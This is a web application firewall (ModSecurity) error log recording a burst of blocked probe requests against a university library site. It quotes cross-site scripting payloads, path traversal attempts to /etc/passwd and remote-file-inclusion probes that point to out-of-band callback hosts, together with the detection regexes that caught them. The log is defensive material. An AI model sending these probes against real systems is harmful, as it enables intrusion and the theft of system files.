[Tue Aug 29 11:53:51.712564 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index_en.php"] [unique_id "ZO1538Co-f0AAApJDUkAAAAY"]
[Tue Aug 29 11:53:52.975268 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO154MCo-f0AAApJDUwAAAAY"]
[Tue Aug 29 11:53:53.094645 2023] [:error] [pid 2632] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:callback: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/client/manage/ourphp_tz.php"] [unique_id "ZO154cCo-f0AAApIdlcAAAAU"]
[Tue Aug 29 11:53:53.544417 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/api.php"] [unique_id "ZO154cCo-f0AAAoW7VwAAAAJ"]
[Tue Aug 29 11:53:54.536001 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/webadmin/authportal/bounce.php"] [unique_id "ZO154sCo-f0AAApOdbwAAAAL"]
[Tue Aug 29 11:53:55.715604 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:text: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/new-year-firework/firework/index.php"] [unique_id "ZO1548Co-f0AAAoZ6U4AAAAK"]
[Tue Aug 29 11:53:55.797300 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mod: list</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/cms/info.php"] [unique_id "ZO1548Co-f0AAApOdcEAAAAL"]
[Tue Aug 29 11:53:56.556865 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:!'><sVg/OnLoAD. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:!'><sVg/OnLoAD: !'><sVg/OnLoAD"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/Login"] [unique_id "ZO155MCo-f0AAApOdcMAAAAL"]
[Tue Aug 29 11:53:56.597205 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:error_description. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:error_description: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php"] [unique_id "ZO155MCo-f0AAApHRXcAAAAP"]
[Tue Aug 29 11:54:00.556638 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prodID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:prodID: '\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/PolicyMgmt/policyDetailsCard.do"] [unique_id "ZO156MCo-f0AAAn40-gAAAAW"]
[Tue Aug 29 11:54:00.584324 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:woof_redraw_elements[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:woof_redraw_elements[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO156MCo-f0AAAoUJfgAAAAB"]
[Tue Aug 29 11:54:00.621287 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:i. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:i: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "ZO156MCo-f0AAApOddIAAAAL"]
[Tue Aug 29 11:54:00.657698 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/inc/supportLoad.asp"] [unique_id "ZO156MCo-f0AAAoUJfsAAAAB"]
[Tue Aug 29 11:54:01.682810 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:TF_submask. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:TF_submask: \\x22><script>alert(2Ue0HYDRcj1tkgDi2D2Z3jM8qWy)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/if.cgi"] [unique_id "ZO156cCo-f0AAApQ2WIAAAAb"]
[Tue Aug 29 11:54:02.651535 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/vsaPres/Web20/core/LocalProxy.ashx"] [unique_id "ZO156sCo-f0AAApJDW0AAAAY"]
[Tue Aug 29 11:54:04.631827 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:success: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO157MCo-f0AAAolKdUAAAAe"]
[Tue Aug 29 11:54:04.846694 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/loginsave.php"] [unique_id "ZO157MCo-f0AAAoZ6W8AAAAK"]
[Tue Aug 29 11:54:08.181139 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....//....//....// found within ARGS:logFile: ....//....//....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/opm/read_sessionlog.php"] [unique_id "ZO158MCo-f0AAApWY0AAAAAM"]
[Tue Aug 29 11:54:08.541111 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:size: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/admin-font-editor/css.php"] [unique_id "ZO158MCo-f0AAApZHScAAAAf"]
[Tue Aug 29 11:54:09.834369 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:theme: tes\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/contact.php"] [unique_id "ZO158cCo-f0AAApZHS4AAAAf"]
[Tue Aug 29 11:54:10.660182 2023] [:error] [pid 2648] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO158sCo-f0AAApYpmIAAAAa"]
[Tue Aug 29 11:54:11.537401 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:windowTitle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ><!-- found within ARGS:windowTitle: AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"] [unique_id "ZO1588Co-f0AAAolKfQAAAAe"]
[Tue Aug 29 11:54:12.746796 2023] [:error] [pid 2659] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0rs9h3rujci65x.oast.site found within TX:1: cjmnijtjmimvgniikdb0rs9h3rujci65x.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO159MCo-f0AAApjILgAAAAm"]
[Tue Aug 29 11:54:14.107075 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:s: \\x22/></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO159sCo-f0AAApV20kAAAAJ"]
[Tue Aug 29 11:54:14.169127 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/stageshow/stageshow_redirect.php"] [unique_id "ZO159sCo-f0AAAoZ6agAAAAK"]
[Tue Aug 29 11:54:14.606779 2023] [:error] [pid 2662] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:TargetService. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:TargetService: /knowage/servlet/AdapterHTTP?Page=LoginPage</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/knowage/servlet/AdapterHTTP"] [unique_id "ZO159sCo-f0AAApmXsoAAAAp"]
[Tue Aug 29 11:54:14.687954 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php"] [unique_id "ZO159sCo-f0AAApLWqIAAAAI"]
[Tue Aug 29 11:54:15.568575 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:id: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/comm.php"] [unique_id "ZO1598Co-f0AAAoZ6aoAAAAK"]
[Tue Aug 29 11:54:16.638608 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:var_filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/viewrq.php"] [unique_id "ZO15@MCo-f0AAApk-TsAAAAn"]
[Tue Aug 29 11:54:16.700077 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prefix. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:prefix: \\x22><script>alert(document.domain);</script><"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/magmi/web/ajax_gettime.php"] [unique_id "ZO15@MCo-f0AAApLWqkAAAAI"]
[Tue Aug 29 11:54:20.967786 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:first. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:first: HOVER ME!</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/plugins/address_add/add.php"] [unique_id "ZO15-MCo-f0AAApa-DsAAAAg"]
